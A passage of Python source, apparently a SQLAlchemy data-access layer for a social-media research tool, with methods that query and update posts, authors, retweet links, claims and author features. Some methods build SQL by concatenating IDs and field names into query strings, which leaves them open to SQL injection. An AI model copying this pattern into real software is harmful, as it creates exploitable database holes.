self.session.commit()\n\n def get_json_post_retweeter(self, post_id, retweeter_id):\n query = \"SELECT * FROM \" + self.post_retweeter_table + \\\n \" WHERE post_id=\" + str(post_id) + \" AND retweeter_id=\" + str(retweeter_id)\n result = self.session.execute(query)\n cursor = result.cursor\n post_retweeter_result = cursor.fetchall()\n\n if len(post_retweeter_result):\n twitter_user = self.create_post_retweeter(post_retweeter_result)\n return twitter_user\n return None\n\n def encode_field_into_utf8(self, text):\n if text is not None:\n return str(text)\n return text\n\n ###########################################################\n # posts\n ###########################################################\n\n def create_object(self, query_result):\n\n object = query_result[0]\n\n '''\n post.post_id = values[0]\n post.author_id = values[1]\n post.post_twitter_id = values[2]\n post.post_vico_guid = values[3]\n post.text = values[4]\n post.title = values[5]\n post.retweet_count = values[6]\n post.favorites_count = values[7]\n post.created_at = values[8]\n post.url = values[9]\n post.is_detailed = values[10]\n post.is_LB = values[11]\n post.domain = values[12]\n '''\n 
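# NOTE: the triple-quoted block above documents the row layout; the method\n # itself simply unwraps the first ORM object from the query result list.\n 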
return object\n\n def delete_post(self, post_id):\n # delete_query = \"DELETE FROM \" + self.posts + \" WHERE post_id=\" + str(post_id)\n # self.session.execute(delete_query)\n # self.session.commit()\n\n self.session.query(Post).filter(Post.post_id == post_id).delete()\n self.session.commit()\n\n def get_post_by_id(self, post_id):\n\n query = self.session.query(Post).filter(Post.post_id == post_id)\n posts_result = query.all()\n\n # query = \"SELECT * FROM \" + self.posts + \" WHERE post_id=\" + str(post_id)\n # result = self.session.execute(query)\n # cursor = result.cursor\n # posts_result = cursor.fetchall()\n\n if len(posts_result):\n post = self.create_object(posts_result)\n return post\n return None\n\n def get_posts(self):\n entries = self.session.query(Post).all()\n return entries\n\n def get_posts_without_retweet_connections(self):\n entries = self.session.query(Post).filter(and_(~exists().where(Post.post_id==PostRetweeterConnection.post_osn_id), Post.domain != 'retweet')).all()\n return entries\n\n def get_posts_with_retweet_connections(self):\n entries = self.session.query(Post).filter(\n and_(exists().where(Post.post_id == PostRetweeterConnection.post_osn_id), Post.domain != 'retweet')).all()\n return entries\n\n def get_posts_retweets_dict_gen(self, limit = 10):\n source_posts = aliased(Post, name='source_posts')\n retweets = aliased(Post, name='retweets')\n # entries = self.session.query(source_posts, retweets).filter(\n # and_(source_posts.post_id == PostRetweeterConnection.post_osn_id,\n # retweets.post_id == PostRetweeterConnection.retweeter_twitter_id,\n # source_posts.domain != u'retweet')).yield_per(10000).enable_eagerloads(False)\n entries = self.session.query(PostRetweeterConnection.post_osn_id, PostRetweeterConnection.retweeter_twitter_id)\n source_retweets_dict = defaultdict(list)\n for source_id, retweet_id in entries:\n source_retweets_dict[source_id].append(retweet_id)\n if len(list(source_retweets_dict.keys())) == limit:\n yield source_retweets_dict\n source_retweets_dict = defaultdict(list)\n yield source_retweets_dict\n\n def get_author_connection_by_source(self, source_ids):\n entries = self.session.query(AuthorConnection.source_author_guid, AuthorConnection.destination_author_guid).filter(AuthorConnection.source_author_guid.in_(set(source_ids)))\n author_connection_dict = defaultdict(set)\n for source_id, dest_id in entries:\n author_connection_dict[source_id].add(dest_id)\n return author_connection_dict\n\n def get_claims(self):\n return self.session.query(Claim).all()\n\n def get_claims_without_tweets(self):\n claims_with_tweets = self.session.query(Claim_Tweet_Connection.claim_id)\n return self.session.query(Claim).filter(~Claim.claim_id.in_(claims_with_tweets)).all()\n\n def get_claims_without_keywords(self):\n claims_with_keywords = self.session.query(Claim_Keywords_Connections.claim_id)\n return self.session.query(Claim).filter(~Claim.claim_id.in_(claims_with_keywords)).all()\n\n def get_claims_by_domain(self, domain):\n return self.session.query(Claim).filter(Claim.domain == domain).all()\n\n def get_posts_with_no_dates(self):\n records = self.session.query(Post).filter(Post.date == '2007-01-01 00:00:00').all()\n return records\n\n def get_all_posts(self):\n entries = self.session.query(Post).all()\n return entries\n\n def get_post_dictionary(self):\n posts = self.session.query(Post).yield_per(100000).enable_eagerloads(False)\n post_id_post_dict = defaultdict()\n for i, post in enumerate(posts):\n print('\\r load posts {}'.format(str(i+1)), 
end=\"\")\n post_id = post.post_id\n post_id_post_dict[post_id] = post\n print()\n return post_id_post_dict\n\n def get_elements_by_args(self, args, offset=0, author_guids=None):\n source_table = args['source']['table_name']\n source_id = args['source']['id']\n source_where_clauses = []\n if 'where_clauses' in args['source']:\n source_where_clauses = args['source']['where_clauses']\n\n connection_table_name = args['connection']['table_name']\n connection_source_id = args['connection']['source_id']\n connection_targeted_id = args['connection']['target_id']\n connection_where_clauses = []\n if 'where_clauses' in args['connection']:\n connection_where_clauses = args['connection']['where_clauses']\n\n destination_table_name = args['destination']['table_name']\n destination_id = args['destination']['id']\n destination_where_clauses = []\n if 'where_clauses' in args['destination']:\n destination_where_clauses = args['destination']['where_clauses']\n\n source_table = aliased(self.get_table_by_name(source_table), name=\"source\")\n connection_table = self.get_table_by_name(connection_table_name)\n destination_table = aliased(self.get_table_by_name(destination_table_name), name=\"dest\")\n connection_conditions = self._get_connection_conditions(connection_where_clauses, destination_table,\n source_table)\n\n source_conditions = self._get_conditions_from_where_cluases(source_table, source_where_clauses)\n destination_conditions = self._get_conditions_from_where_cluases(destination_table, destination_where_clauses)\n conditions = source_conditions + destination_conditions + connection_conditions\n source_id_attr = getattr(source_table, source_id)\n connection_source_attr = getattr(connection_table, connection_source_id)\n connection_target_attr = getattr(connection_table, connection_targeted_id)\n destination_id_attr = getattr(destination_table, destination_id)\n\n if author_guids:\n conditions.append(~connection_source_attr.in_(set(author_guids)))\n\n table_elements = self.session.query(connection_source_attr, destination_table) \\\n .join(source_table, connection_source_attr == source_id_attr) \\\n .join(destination_table, connection_target_attr == destination_id_attr) \\\n .filter(and_(condition for condition in conditions)) \\\n .order_by(connection_source_attr) \\\n .yield_per(10000).enable_eagerloads(False).offset(offset)\n\n return table_elements\n\n def _get_connection_conditions(self, connection_where_clauses, destination_table, source_table):\n connection_conditions = []\n for where_clause in connection_where_clauses:\n val1 = where_clause[\"val1\"]\n val2 = where_clause[\"val2\"]\n val1_attr = self._get_table_attr_by_prefix(destination_table, source_table, val1)\n val2_attr = self._get_table_attr_by_prefix(destination_table, source_table, val2)\n op_name = where_clause[\"op\"]\n if op_name == \"timeinterval\":\n delta = where_clause[\"delta\"]\n binary_exp1 = func.datetime(val1_attr, \"-{0} day\".format(delta)) <= val2_attr\n binary_exp2 = func.datetime(val1_attr, \"+{0} day\".format(delta)) >= val2_attr\n connection_conditions.append(binary_exp1)\n connection_conditions.append(binary_exp2)\n\n elif op_name == \"before\":\n delta = where_clause[\"delta\"]\n binary_exp1 = func.datetime(val1_attr, \"-{0} day\".format(delta)) <= val2_attr\n binary_exp2 = val1_attr > val2_attr\n connection_conditions.append(binary_exp1)\n connection_conditions.append(binary_exp2)\n elif op_name == \"after\":\n delta = where_clause[\"delta\"]\n binary_exp1 = val1_attr <= val2_attr\n binary_exp2 = 
func.datetime(val1_attr, \"+{0} day\".format(delta)) >= val2_attr\n connection_conditions.append(binary_exp1)\n connection_conditions.append(binary_exp2)\n else:\n\n binary_exp = val1_attr.op(op_name)(val2_attr)\n connection_conditions.append(binary_exp)\n return connection_conditions\n\n def _get_table_attr_by_prefix(self, destination_table, source_table, val1):\n if \"source\" in val1:\n val1_attr = getattr(source_table, val1.replace('source.', ''))\n elif \"dest\" in val1:\n val1_attr = getattr(destination_table, val1.replace('dest.', ''))\n else:\n val1_attr = val1\n return val1_attr\n\n def get_table_elements_by_ids(self, table_name, id_field, ids, where_cluases=[]):\n table_elements = self.get_table_elements_by_where_cluases(table_name, where_cluases, id_field)\n ids_set = set(ids)\n table_elements = [element for element in table_elements if getattr(element, id_field) in ids_set]\n return table_elements\n\n def get_table_elements_by_where_cluases(self, table_name, where_cluases, data_id, offset=0, author_guids=None):\n table = self.get_table_by_name(table_name)\n conditions = self._get_conditions_from_where_cluases(table, where_cluases)\n if author_guids:\n conditions.append(~getattr(table, data_id).in_(set(author_guids)))\n\n table_elements = self.session.query(table) \\\n .filter(and_(condition for condition in conditions)) \\\n .order_by(data_id) \\\n .yield_per(10000).enable_eagerloads(False).offset(offset)\n return table_elements\n\n def _get_conditions_from_where_cluases(self, table, where_cluases):\n conditions = []\n for where_clause_dict in where_cluases:\n field_name = where_clause_dict['field_name']\n value = where_clause_dict['value']\n op_name = '='\n if 'op' in where_clause_dict:\n op_name = where_clause_dict['op']\n try:\n table_attr = getattr(table, field_name)\n binary_exp = table_attr.op(op_name)(value)\n except:\n table_attr = field_name\n binary_exp = field_name == value\n conditions.append(binary_exp)\n return conditions\n\n def get_table_dictionary(self, table_name, table_id):\n table = self.get_table_by_name(table_name)\n posts = self.session.query(table).all()\n post_id_post_dict = defaultdict()\n for post in posts:\n post_id = getattr(post, table_id)\n post_id_post_dict[post_id] = post\n return post_id_post_dict\n\n def get_filterd_author_dict(self, author_ids):\n authors = self.session.query(Author).filter(Author.author_guid.in_(author_ids)).yield_per(10000).enable_eagerloads(False)\n author_id_author_dict = defaultdict()\n for i, author in enumerate(authors):\n print('\\rload authors {}'.format(i), end='')\n author_guid = getattr(author, 'author_guid')\n author_id_author_dict[author_guid] = author\n print()\n return author_id_author_dict\n\n def get_filterd_source_dict(self, source_ids, table_name, key_name):\n table = self.get_table_by_name(table_name)\n key_field = getattr(table, key_name)\n\n items = self.session.query(table).filter(key_field.in_(source_ids)).yield_per(10000).enable_eagerloads(False)\n source_id_source_dict = defaultdict()\n for i, item in enumerate(items):\n print('\\rload {} {}'.format(table_name, str(i+1)), end='')\n item_key = getattr(item, key_name)\n source_id_source_dict[item_key] = item\n print()\n return source_id_source_dict\n\n def get_author_dictionary(self):\n return self.authors_dict_by_field('author_guid')\n\n def authors_dict_by_field(self, field='author_guid'):\n authors = self.session.query(Author).yield_per(10000).enable_eagerloads(False)\n author_id_author_dict = defaultdict()\n for i, author in enumerate(authors):\n 
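# NOTE: rows are streamed via yield_per(10000), keeping memory bounded for\n # large author tables; defaultdict() with no default_factory behaves like a\n # plain dict here.\n 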
print('\\rload authors {}'.format(i), end='')\n author_guid = getattr(author, field)\n author_id_author_dict[author_guid] = author\n print()\n return author_id_author_dict\n\n def get_author_guid_posts_dict(self):\n posts = self.session.query(Post).yield_per(10000).enable_eagerloads(False)\n author_guid_posts_dict = defaultdict(list)\n for post in posts:\n author_guid_posts_dict[post.author_guid].append(post)\n return author_guid_posts_dict\n\n def _get_posts_content_screen_name_tuples(self):\n logging.info(\"Get all post content\")\n q = \"SELECT DISTINCT posts.content,posts.author \" \\\n \"FROM posts \" \\\n \"WHERE posts.domain = 'Microblog'\"\n\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n return cursor\n # records = list(cursor.fetchall())\n # return records\n\n def get_posts_by_domain(self, domain):\n posts_by_user = {}\n # posts = self.session.query(Post).filter(Post.domain == unicode(domain)).slice(start,stop).all()\n query = text(\"select posts.author_guid, posts.date, posts.content from posts where posts.domain = :domain \"\n \"and length(posts.content)>0 and posts.date IS NOT NULL\")\n counter = 0\n print(\"schema_definition.get_posts_by_domain before executing query..\")\n result = self.session.execute(query, params=dict(domain=domain))\n print(\"schema_definition.get_posts_by_domain finished executing query..\")\n cursor = result.cursor\n print(\"schema_definition.get_posts_by_domain before calling generator function\")\n posts = self.result_iter(cursor, arraysize=10000)\n print(\"schema_definition.get_posts_by_domain after calling generator function\")\n\n posts_by_user = self._create_user_posts_dictinary(posts)\n # TODO added by lior, needs to verify that it doesn't break anything\n if len(posts_by_user) == 0:\n guid = self.get_author_guids()\n posts_by_user = {author: () for author in guid}\n return posts_by_user\n\n def get_author_posts_dict_by_minimal_num_of_posts(self, domain, min_num_of_posts):\n query = \"\"\"\n SELECT posts.author_guid, posts.date, posts.content\n FROM posts\n WHERE posts.author_guid IN (\n\t SELECT posts.author_guid\n\t FROM posts\n\t WHERE posts.domain = :domain\n\t AND LENGTH(posts.content)>0\n\t GROUP BY posts.author_guid\n\t HAVING COUNT(*) >= :min_num_of_posts\n )\n \"\"\"\n # posts = self.session.query(Post).filter(Post.domain == unicode(domain)).slice(start,stop).all()\n query = text(query)\n result = self.session.execute(query, params=dict(domain=domain, min_num_of_posts=min_num_of_posts))\n cursor = result.cursor\n posts = self.result_iter(cursor, arraysize=10000)\n posts_by_user = self._create_user_posts_dictinary(posts)\n return posts_by_user\n\n def get_random_author_posts_dict_by_minimal_num_of_posts(self):\n query = \"\"\"\n SELECT posts.author_guid, posts.date, posts.content\n FROM posts\n WHERE LENGTH(posts.content)>0\n AND posts.author_guid IN (\n SELECT random_authors_for_graphs.author_guid\n FROM random_authors_for_graphs\n )\n \"\"\"\n # posts = self.session.query(Post).filter(Post.domain == unicode(domain)).slice(start,stop).all()\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n posts = self.result_iter(cursor) # , arraysize=10000)\n posts_by_user = self._create_user_posts_dictinary(posts)\n return posts_by_user\n\n def _create_user_posts_dictinary(self, posts):\n posts_by_user = defaultdict(list)\n counter = 0\n for current_post in posts:\n counter += 1\n if counter % 5000 == 0:\n msg = \"\\r Creating post objects \" + str(counter)\n print(msg, 
end=\"\")\n str_date = current_post[1]\n date_obj = datetime.datetime.strptime(str_date, '%Y-%m-%d %H:%M:%S')\n post = Struct(author_guid=current_post[0], date=date_obj, content=current_post[2])\n\n posts_by_user[str(post.author_guid)].append(post)\n return posts_by_user\n\n def get_single_post_per_author_topic_mapping(self):\n q = \" select * from single_post_per_author_topic_mapping\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n result = list(cursor.fetchall())\n return result\n\n def get_posts_by_author_guid(self, author_guid):\n\n query = self.session.query(Post).filter(Post.author_guid == author_guid).order_by(Post.date)\n entries = query.all()\n return entries\n\n \"\"\"\n if window_start and window_end is not given search in all DB\n \"\"\"\n\n def isPostExist(self, url, window_start=None, window_end=None):\n\n if window_start is None or window_end is None:\n query = text(\"SELECT EXISTS(SELECT * FROM posts WHERE (url= :url) limit 1)\")\n result = self.session.execute(query, params=dict(url=str(url)))\n return [r for (r,) in result][0]\n else:\n query = text(\n \"SELECT EXISTS(SELECT * FROM posts WHERE (url= :url or guid= :guid) and (:window_start <= date and \"\n \"date <=:window_end) limit 1)\")\n result = self.session.execute(query,\n params=dict(url=str(url), window_start=window_start, window_end=window_end))\n return [r for (r,) in result][0]\n\n def addPost(self, post):\n self.session.merge(post)\n\n def addPosts(self, posts):\n logging.info(\"total Posts inserted to DB: \" + str(len(posts)))\n i = 1\n self.session.flush()\n for post in posts:\n if (i % 100 == 0):\n msg = \"\\r Insert post to DB: [{}\".format(i) + \"/\" + str(len(posts)) + ']'\n print(msg, end=\"\")\n i += 1\n self.addPost(post)\n # self.session.flush()\n self.session.commit()\n if len(posts) != 0: print(\"\")\n\n def merge_items(self, items):\n logging.info(\"total items inserted to DB: \" + str(len(items)))\n for i, item in enumerate(items):\n if (i % 100 == 0):\n msg = \"\\r Insert items to DB: [{}\".format(str(i + 1)) + \"/\" + str(len(items)) + ']'\n print(msg, end=\"\")\n self.session.merge(item)\n\n def updatePost(self, post):\n self.session.query(Post).filter(Post.url == post[0]).update(post[1])\n\n def updatePosts(self, posts):\n logging.info(\"total Posts updated to DB: \" + str(len(posts)))\n i = 1\n for post in posts:\n msg = \"\\r update post to DB: [{}\".format(i) + \"/\" + str(len(posts)) + ']'\n print(msg, end=\"\")\n i += 1\n self.updatePost(post)\n self.session.commit()\n if len(posts) != 0: print(\"\")\n\n def getPostUsingURL(self, url, window_start=None, window_end=None):\n if window_start is None or window_end is None:\n query = self.session.query(Post).filter(Post.url == url)\n else:\n query = self.session.query(Post).filter(\n and_(Post.url == url, window_start <= Post.date, Post.date <= window_end))\n return query.all()\n\n def isRefExist(self, url):\n q = text(\"SELECT EXISTS(SELECT * FROM posts WHERE url= :url limit 1)\")\n res = self.session.execute(q, params=dict(url=str(url)))\n return [r for (r,) in res][0]\n\n def isPostNotDetailed(self, url, guid):\n q = text(\"SELECT EXISTS(SELECT * FROM posts WHERE (url= :url or guid= :guid) and \\\n is_detailed=0 limit 1)\")\n res = self.session.execute(q, params=dict(url=str(url), guid=str(guid)))\n return [r for (r,) in res][0]\n\n def addReference(self, reference):\n self.session.merge(reference)\n\n def addReferences(self, references):\n i = 1\n for ref in references:\n msg = \"\\r Add ref: 
[{}\".format(i) + \"/\" + str(len(references)) + ']'\n print(msg, end=\"\")\n i += 1\n self.addReference(ref)\n self.session.commit()\n\n def getPostsMaxDate(self, window_start=None, window_end=None):\n if window_start is None or window_end is None:\n res = self.session.query(func.max(Post.date))\n else:\n res = self.session.query(func.max(Post.date)).filter(\n and_(Post.date >= window_start, Post.date <= window_end))\n return res.scalar()\n\n def contains_post(self, post_url):\n q = text(\"select * from posts where posts.url = :post_url\")\n res = self.session.execute(q, params=dict(post_url=post_url))\n res = [r for r in res]\n return len(res) > 0\n\n ###########################################################\n # authors\n ###########################################################\n\n def insertIntoAuthorsTable(self, win_start, win_end):\n # TODO: remove window_start and window_end\n q = text(\n \"insert or ignore into authors(name,domain,author_guid, xml_importer_insertion_date) select distinct author,domain,author_guid, xml_importer_insertion_date from posts where author_guid>''\")\n self.session.execute(q)\n self.session.commit()\n\n def insert_or_update_authors_from_xml_importer(self, win_start, win_end):\n authors_to_update = []\n posts = self.session.query(Post).filter(Post.author_guid != \"\").all()\n logging.info(\"Insert or update_authors from xml importer\")\n logging.info(\"total Posts: \" + str(len(posts)))\n i = 1\n for post in posts:\n msg = \"\\r Insert or update posts: [{}\".format(i) + \"/\" + str(len(posts)) + ']'\n print(msg, end=\"\")\n i += 1\n author_guid = post.author_guid\n domain = post.domain\n result = self.get_author_by_author_guid_and_domain(author_guid, domain)\n if not result:\n author = Author()\n author.name = post.author\n author.domain = post.domain\n author.author_guid = post.author_guid\n else:\n author = result[0]\n author.xml_importer_insertion_date = post.xml_importer_insertion_date\n authors_to_update.append(author)\n if len(posts) != 0: print(\"\")\n self.add_authors(authors_to_update)\n\n def addAuthor(self, author):\n self.session.merge(author)\n\n def addAuthors(self, authorsList):\n logging.info(\"total Posts inserted to DB: \" + str(len(authorsList)))\n i = 1\n for author in authorsList:\n if (i % 100 == 0):\n msg = \"\\r Insert author to DB: [{}\".format(i) + \"/\" + str(len(authorsList)) + ']'\n print(msg, end=\"\")\n i += 1\n self.addAuthor(author)\n self.commit()\n\n def insert_authors(self):\n query = text(\n \"insert or ignore into authors(author_screen_name) select distinct author_screen_name from posts where author_screen_name>''\")\n self.session.execute(query)\n self.session.commit()\n\n def get_authors(self):\n result = self.session.query(Author).all()\n return result\n\n def get_authors_media_pats(self):\n result = self.session.query(Author.media_path).filter(Author.media_path.isnot(None)).all()\n return result\n\n def get_authors_withot_connection(self, connection_type):\n # query = self.session.query(Author).filter(and_(Author.author_guid.in_(AuthorConnection.source_author_guid),\n # AuthorConnection.connection_type == connection_type))\n\n query = text(\"\"\"SELECT *\n FROM authors\n WHERE authors.author_guid NOT IN (SELECT source_author_guid \n FROM author_connections\n WHERE connection_type = :connection_type)\n \"\"\")\n result = self.session.execute(query, params=dict(connection_type=connection_type))\n author_dicts = list(map(dict, result))\n authors = [Author(**author_dict) for author_dict in author_dicts]\n return 
authors\n\n def get_authors_with_connections(self, connection_type):\n # query = self.session.query(Author).filter(and_(Author.author_guid.in_(AuthorConnection.source_author_guid),\n # AuthorConnection.connection_type == connection_type))\n\n query = text(\"\"\"SELECT source_author_guid \n FROM author_connections\n WHERE connection_type = :connection_type\n \"\"\")\n result = self.session.execute(query, params=dict(connection_type=connection_type))\n cursor = result.cursor\n tuples = cursor.fetchall()\n authors = set(chain(*tuples))\n return authors\n\n def get_reddit_authors(self):\n result = self.session.query(RedditAuthor).all()\n return result\n\n def get_reddit_posts(self):\n result = self.session.query(RedditPost).all()\n return result\n\n def get_all_authors(self):\n result = self.session.query(Author).all()\n return result\n\n def get_authors_by_domain(self, domain):\n targeted_social_network = getConfig().get(\"DEFAULT\", \"social_network_name\")\n # if targeted_social_network == Social_Networks.TWITTER:\n # result = self.session.query(Author).filter(and_(Author.domain == unicode(domain)),\n # Author.author_osn_id.isnot(None),\n # or_(Author.xml_importer_insertion_date.isnot(None), Author.mark_missing_bad_actor_retweeters_insertion_date.isnot(None))).all()\n # else:\n result = self.session.query(Author).filter(and_(Author.domain == str(domain))\n ).all()\n\n return result\n\n def get_temp_author_connections_all(self):\n result = self.session.query(TempAuthorConnection).all()\n\n return result\n\n def get_authors_by_domain_dict(self):\n authors = self.get_authors()\n author_domain_dict = defaultdict(list)\n for author in authors:\n author_domain_dict[author.domain].append(author)\n return author_domain_dict\n\n def get_author_guid_to_author_dict(self):\n authors = self.get_all_authors()\n authors_dict = dict((aut.author_guid, aut) for aut in authors)\n return authors_dict\n\n # def get_authors_by_domain(self, domain):\n # targeted_social_network = getConfig().get(\"DEFAULT\", \"social_network_name\")\n # if targeted_social_network == Social_Networks.TWITTER:\n # result = self.session.query(Author).filter(and_(Author.domain == unicode(domain)),\n # Author.author_osn_id.isnot(None),\n # or_(Author.xml_importer_insertion_date.isnot(None), Author.mark_missing_bad_actor_retweeters_insertion_date.isnot(None))).all()\n # else:\n # result = self.session.query(Author).filter(and_(Author.domain == unicode(domain)),\n # Author.author_osn_id.isnot(None)\n # ).all()\n #\n # return result\n\n # def get_authors(self, domain):\n # result = self.session.query(Author).filter(and_(Author.domain == unicode(domain),\n # Author.author_osn_id.isnot(None))\n # ).all()\n #\n # return result\n\n def get_number_of_targeted_osn_authors(self, domain):\n query = text(\"\"\"SELECT COUNT(authors.author_guid)\n FROM authors\n WHERE authors.domain = :domain\n AND authors.author_osn_id IS NOT NULL\n AND (authors.xml_importer_insertion_date IS NOT NULL\n OR authors.mark_missing_bad_actor_retweeters_insertion_date IS NOT NULL)\"\"\")\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n tuples = cursor.fetchall()\n if tuples is not None and len(tuples) > 0:\n authors_count = tuples[0][0]\n return authors_count\n return None\n\n def get_number_of_authors(self):\n query = text(\"\"\"SELECT COUNT(authors.author_guid)\n FROM authors\"\"\")\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = cursor.fetchall()\n if tuples is not None and len(tuples) > 0:\n 
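# the aggregate query returns a single row whose first column holds the COUNT value\n            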
authors_count = tuples[0][0]\n return authors_count\n return None\n\n def get_number_of_targeted_osn_posts(self, domain):\n query = text(\"\"\"SELECT COUNT(posts.author_guid)\n FROM posts\n WHERE posts.domain = :domain\"\"\")\n result = self.session.execute(query, params=dict(domain=domain))\n cursor = result.cursor\n tuples = cursor.fetchall()\n if tuples is not None and len(tuples) > 0:\n posts_count = tuples[0][0]\n return posts_count\n return None\n\n def get_number_of_posts(self):\n query = text(\"\"\"SELECT COUNT(posts.author_guid)\n FROM posts\"\"\")\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = cursor.fetchall()\n if tuples is not None and len(tuples) > 0:\n posts_count = tuples[0][0]\n return posts_count\n return None\n\n def get_author_by_guid(self, guid):\n ans = self.session.query(Author).filter(Author.author_guid == guid).all()\n return ans[0]\n\n def getAuthorByName(self, name):\n logging.info(\"Name of given author is: \" + name)\n return self.session.query(Author).filter(Author.name == name).all()\n\n def getAuthorIDbyNameAndDomain(self, name, start_wind, domain):\n res = self.session.query(Author.author_guid).filter(Author.name == name and Author.domain == domain).all()\n\n return [r for (r,) in res][0]\n\n def get_author_guid_and_author_osn_id(self, domain):\n data = {}\n query = text(\" SELECT author_guid, author_osn_id \\\n FROM authors \\\n WHERE(authors.xml_importer_insertion_date IS NOT NULL \\\n OR authors.mark_missing_bad_actor_retweeters_insertion_date IS NOT NULL ) \\\n AND authors.author_osn_id IS NOT NULL AND authors.domain = :domain \")\n res = self.session.execute(query, params=dict(domain=domain))\n all_rows = res.cursor.fetchall()\n\n for row in all_rows:\n data[row[0]] = row[1]\n return data\n\n '''\n def get_author_by_id(self, author_id):\n\n query = self.session.query(Author).filter(Author.author_id == author_id)\n posts_result = query.all()\n\n #query = \"SELECT * FROM \" + self.posts + \" WHERE post_id=\" + str(post_id)\n #result = self.session.execute(query)\n #cursor = result.cursor\n #posts_result = cursor.fetchall()\n\n if len(posts_result):\n post = self.create_object(posts_result)\n return post\n return None\n '''\n\n def delete_author(self, name, domain, author_guid):\n self.session.query(Author).filter(\n (Author.name == name) & (Author.domain == domain) & (Author.author_guid == author_guid)).delete()\n self.session.commit()\n\n def update_author(self, author):\n self.session.merge(author)\n\n def update_author_type_by_author_guid(self, guid, type):\n self.session.query(Author).filter(Author.author_guid == guid).update({'author_type': type})\n self.session.commit()\n\n def get_author_name_by_post_content(self, post_content):\n query = text(\"select posts.author from posts where posts.content like :post_content\")\n res = self.session.execute(query, params=dict(post_content=post_content + \"%\"))\n return [author_name[0] for author_name in res]\n\n ###########################################################\n # author_citations\n ###########################################################\n\n def deleteAuthCit(self, window_start=None):\n if window_start:\n self.session.query(AuthorCitation).filter(AuthorCitation.window_start == window_start).delete()\n\n else:\n self.session.query(AuthorCitation).delete()\n self.session.commit()\n pass\n\n def insertIntoAuthorCitation(self, win_start, win_end):\n\n q = text(\n \" insert into author_citations (from_author, from_domain, to_author, to_domain, window_start, window_end, 
number_of_citations,from_author_guid,to_author_guid) \\\n            select \\\n            p1.author as from_author, \\\n            p1.domain as from_domain, \\\n            p2.author as to_author, \\\n            p2.domain as to_domain, \\\n            :window_start as window_start, \\\n            :window_end as window_end, \\\n            count(*) as number_of_citations, \\\n            p1.author_guid as from_author_guid, \\\n            p2.author_guid as to_author_guid \\\n            from \\\n            post_citations as ref \\\n            inner join posts as p1 on p1.post_id=ref.post_id_from \\\n            inner join posts as p2 on p2.post_id=ref.post_id_to \\\n            where \\\n            p2.author_guid>'' and p1.author_guid>'' and \\\n            :window_start <= p1.date and p1.date <= :window_end \\\n            group by from_author, from_domain, to_author, to_domain \")\n\n        self.session.execute(q, params=dict(window_start=win_start, window_end=win_end))\n        self.commit()\n\n    ###########################################################\n    # author_features\n    ###########################################################\n\n    def get_author_features_by_author_guid(self, author_guid):\n        result = self.session.query(AuthorFeatures).filter(AuthorFeatures.author_guid == author_guid).all()\n        if len(result) > 0:\n            return result\n        return None\n\n    def get_author_feature(self, author_guid, attribute_name):\n        result = self.session.query(AuthorFeatures).filter(and_(AuthorFeatures.author_guid == author_guid,\n                                                                AuthorFeatures.attribute_name == attribute_name)).all()\n        if len(result) > 0:\n            return result[0]\n        return None\n\n    def get_author_features(self):\n\n        result = self.session.query(AuthorFeatures).all()\n        # if len(result) > 0:\n        return result\n        # return None\n\n    def get_author_features_labeled_authors_only(self):\n        query = text('select author_features.* \\\n            from \\\n            author_features \\\n            inner join authors on (author_features.author_guid = authors.author_guid) \\\n            where authors.author_type is not null')\n        result = self.session.execute(query)\n        cursor = result.cursor\n        author_features = cursor.fetchall()\n        return author_features\n\n    def get_author_features_lazy(self, offset=0, yield_per=10000):\n        result = self.session.query(AuthorFeatures).yield_per(yield_per).enable_eagerloads(False).offset(offset)\n        return result\n\n    def get_author_features_labeled_authors_only_lazy(self, offset=0, yield_per=10000):\n        # join each feature row to its Author and keep only authors that carry a label\n        result = self.session.query(AuthorFeatures)\\\n            .join(Author, AuthorFeatures.author_guid == Author.author_guid)\\\n            .filter(Author.author_type.isnot(None))\\\n            .yield_per(yield_per).enable_eagerloads(False).offset(offset)\n        return result\n\n    def get_author_features_by_author_id_field(self, author_id_field, target_field, is_labeled):\n        logging.info(\"Start getting authors features\")\n        if is_labeled:\n            query = text(\n                'select author_features.*, authors.' + target_field + ' from author_features inner join authors on (author_features.author_guid = authors.' + author_id_field + ') where authors.author_type is not null')\n        else:\n            query = text('select author_features.*, authors.' + target_field + ' \\\n                from \\\n                author_features \\\n                inner join authors on (author_features.author_guid = authors.' + author_id_field + ') \\\n                where authors.author_type is null')\n        result = self.session.execute(query)\n        cursor = result.cursor\n        author_features = cursor.fetchall()\n        logging.info(\"Finished getting authors features\")\n\n        return author_features\n\n    def get_author_features_unlabled_authors_only_by_author_id_field(self, author_id_field, target_field):\n        logging.info(\"Start getting authors features\")\n\n        query = text('select author_features.*, authors.' + target_field + ' \\\n            from \\\n            author_features \\\n            inner join authors on (author_features.author_guid = authors.' + author_id_field + ') \\\n            where authors.author_type is null')\n        result = self.session.execute(query)\n        cursor = result.cursor\n        author_features = cursor.fetchall()\n        logging.info(\"Finished getting authors features\")\n        return author_features\n\n    def insert_authors_features(self, list_author_features):\n        self.session.add_all(list_author_features)\n\n    def update_author_features(self, author_features):\n        self.session.merge(author_features)\n\n    def update_target_articles(self, target_article):\n        self.session.merge(target_article)\n\n    def update_image_hidden_text(self, image_hidden_text):\n        self.session.merge(image_hidden_text)\n\n    def add_author_features(self, author_features):\n        logging.info(\"total Author Features inserted to DB: \" + str(len(author_features)))\n        i = 1\n        for author_feature in author_features:\n            if (i % 100 == 0):\n                msg = \"\\r Insert author features to DB: [{}\".format(i) + \"/\" + str(len(author_features)) + ']'\n                print(msg, end=\"\")\n            i += 1\n            self.update_author_features(author_feature)\n        self.commit()\n\n    def convert_auhtor_feature_author_id_form_author_name_to_author_guid(self):\n        query = text(\"update author_features SET author_guid = (select author_guid from authors where authors.name = author_features.author_guid)\")\n        self.session.execute(query)\n        self.commit()\n\n    def add_target_articles(self, target_articles):\n        logging.info(\"target_articles inserted to DB: \" + str(len(target_articles)))\n        i = 1\n        for target_article in target_articles:\n            if (i % 100 == 0):\n                msg = \"\\r Insert target_article to DB: [{}\".format(i) + \"/\" + str(len(target_articles)) + ']'\n                print(msg, end=\"\")\n            i += 1\n            self.update_target_articles(target_article)\n        self.commit()\n\n    def add_image_hidden_texts(self, image_hidden_texts):\n        logging.info(\"image_hidden_texts inserted to DB: \" + str(len(image_hidden_texts)))\n        i = 1\n        for 